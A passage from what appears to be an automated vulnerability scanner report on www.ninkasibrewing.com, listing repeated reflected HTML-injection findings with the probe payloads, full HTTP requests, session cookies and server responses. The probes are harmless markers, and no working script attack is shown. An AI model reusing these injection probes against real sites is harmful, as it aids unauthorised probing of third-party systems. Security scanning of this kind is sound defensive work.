User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentd58e6"><a>673bbcd9798_page" class="contentd58e6">
...[SNIP]...

1.233. http://www.ninkasibrewing.com/content/img/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a62b0"><a>552d9ff3d4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta62b0"><a>552d9ff3d4d/img/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta62b0"><a>552d9ff3d4d_page" class="contenta62b0">
...[SNIP]...

1.234. http://www.ninkasibrewing.com/content/img/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874f9"><a>3827eb81fc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content874f9"><a>3827eb81fc7/img/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content874f9"><a>3827eb81fc7_page" class="content874f9">
...[SNIP]...

1.235. http://www.ninkasibrewing.com/content/img/skin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7fb"><a>d9b89a79e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1b7fb"><a>d9b89a79e3e/img/skin/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1b7fb"><a>d9b89a79e3e_page" class="content1b7fb">
...[SNIP]...

1.236. http://www.ninkasibrewing.com/content/img/skin/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 751d3"><a>fcf7cbffa31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content751d3"><a>fcf7cbffa31/img/skin/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content751d3"><a>fcf7cbffa31_page" class="content751d3">
...[SNIP]...

1.237. http://www.ninkasibrewing.com/content/img/skin/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8616a"><a>5ae4af16787 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content8616a"><a>5ae4af16787/img/skin/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content8616a"><a>5ae4af16787_page" class="content8616a">
...[SNIP]...

1.238. http://www.ninkasibrewing.com/content/img/skin/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b3e"><a>f6c375e180b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content46b3e"><a>f6c375e180b/img/skin/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content46b3e"><a>f6c375e180b_page" class="content46b3e">
...[SNIP]...

1.239. http://www.ninkasibrewing.com/content/img/skin/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e515"><a>56087270b4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content5e515"><a>56087270b4d/img/skin/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content5e515"><a>56087270b4d_page" class="content5e515">
...[SNIP]...

1.240. http://www.ninkasibrewing.com/content/img/skin/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7dc2"><a>a7f908ef1e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta7dc2"><a>a7f908ef1e0/img/skin/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta7dc2"><a>a7f908ef1e0_page" class="contenta7dc2">
...[SNIP]...

1.241. http://www.ninkasibrewing.com/content/img/skin/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c044c"><a>596b9b87e27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentc044c"><a>596b9b87e27/img/skin/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentc044c"><a>596b9b87e27_page" class="contentc044c">
...[SNIP]...

1.242. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84dd"><a>998f8f781b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta84dd"><a>998f8f781b2/img/skin/ninkasi-random/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta84dd"><a>998f8f781b2_page" class="contenta84dd">
...[SNIP]...

1.243. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa20"><a>7c1fe0d07f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1aa20"><a>7c1fe0d07f2/img/skin/ninkasi-random/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1aa20"><a>7c1fe0d07f2_page" class="content1aa20">
...[SNIP]...

1.244. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aacc"><a>2d12b65e1f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content9aacc"><a>2d12b65e1f4/img/skin/ninkasi-random/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:51:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content9aacc"><a>2d12b65e1f4_page" class="content9aacc">
...[SNIP]...

1.245. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff256"><a>504bb81dd8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentff256"><a>504bb81dd8e/img/skin/ninkasi-random/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentff256"><a>504bb81dd8e_page" class="contentff256">
...[SNIP]...

1.246. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accc7"><a>cc0bd9440f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentaccc7"><a>cc0bd9440f7/img/skin/ninkasi-random/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentaccc7"><a>cc0bd9440f7_page" class="contentaccc7">
...[SNIP]...

1.247. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590ea"><a>0538fc89295 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content590ea"><a>0538fc89295/img/skin/ninkasi-random/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content590ea"><a>0538fc89295_page" class="content590ea">
...[SNIP]...

1.248. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44eb8"><a>507cafa61ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content44eb8"><a>507cafa61ff/img/skin/ninkasi-random/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content44eb8"><a>507cafa61ff_page" class="content44eb8">
...[SNIP]...

1.249. http://www.ninkasibrewing.com/content/js/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a306"><a>684cd006b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6a306"><a>684cd006b5e/js/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content6a306"><a>684cd006b5e_page" class="content6a306">
...[SNIP]...

1.250. http://www.ninkasibrewing.com/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c9a9"><a>41638d41753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

